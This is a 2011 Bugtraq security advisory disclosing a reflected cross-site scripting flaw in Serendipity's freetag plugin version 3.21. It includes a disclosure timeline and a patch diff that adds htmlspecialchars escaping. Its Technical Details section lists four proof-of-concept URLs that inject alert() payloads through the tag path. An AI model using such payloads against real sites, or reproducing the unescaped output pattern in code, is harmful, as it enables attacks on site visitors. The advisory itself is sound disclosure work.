[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
- From: sschurtz@xxxxxxxxxxx
- Date: 31 May 2011 10:28:12 -0000
Advisory: Cross-Site Scripting vulnerability in Serendipity Plugin
"serendipity_event_freetag"
Advisory ID: SSCHADV2011-004
Author: Stefan Schurtz
Affected Software: Successfully tested on: Serendipity 1.5.5 with
serendipity_event_freetag - version 3.21
Vendor URL: http://www.s9y.org
Vendor Status: Version 3.22 - Fix possible XSS
CVE-ID: -
==========================
Vulnerability Description:
==========================
This is Cross-Site Scripting vulnerability
==================
Technical Details:
==================
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body
onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body
onload=alert(String.fromCharCode(88,83,83))>
http://www.example.com/serendipity/index.php?/plugin/tag/<body
onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body
onload=alert(String.fromCharCode(88,83,83))>
=========
Solution:
=========
Update to the latest version 3.22
diff serendipity_event_freetag.php
< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30
garvinhicking Exp $
> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24
> garvinhicking Exp $
< $propbag->add('version', '3.21');
> $propbag->add('version', '3.22');
< $serendipity['smarty']->assign('freetag_tagTitle',
is_array($this->displayTag) ? implode(' + ',$this->displayTag) :
$this->displayTag);
> $serendipity['smarty']->assign('freetag_tagTitle',
> htmlspecialchars(is_array($this->displayTag) ? implode(' +
> ',$this->displayTag) : $this->displayTag));
====================
Disclosure Timeline:
====================
30-May-2011 - informed developers
30-May-2011 - Release date of this security advisory
30-May-2011 - Version 3.22 - Fix possible XSS
31-May-2011 - post on BugTraq and Full-disclosure
========
Credits:
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References:
===========
http://www.s9y.org
http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html
http://www.rul3z.de/advisories/SSCHADV2011-004.txt
http://ha.ckers.org/xss.html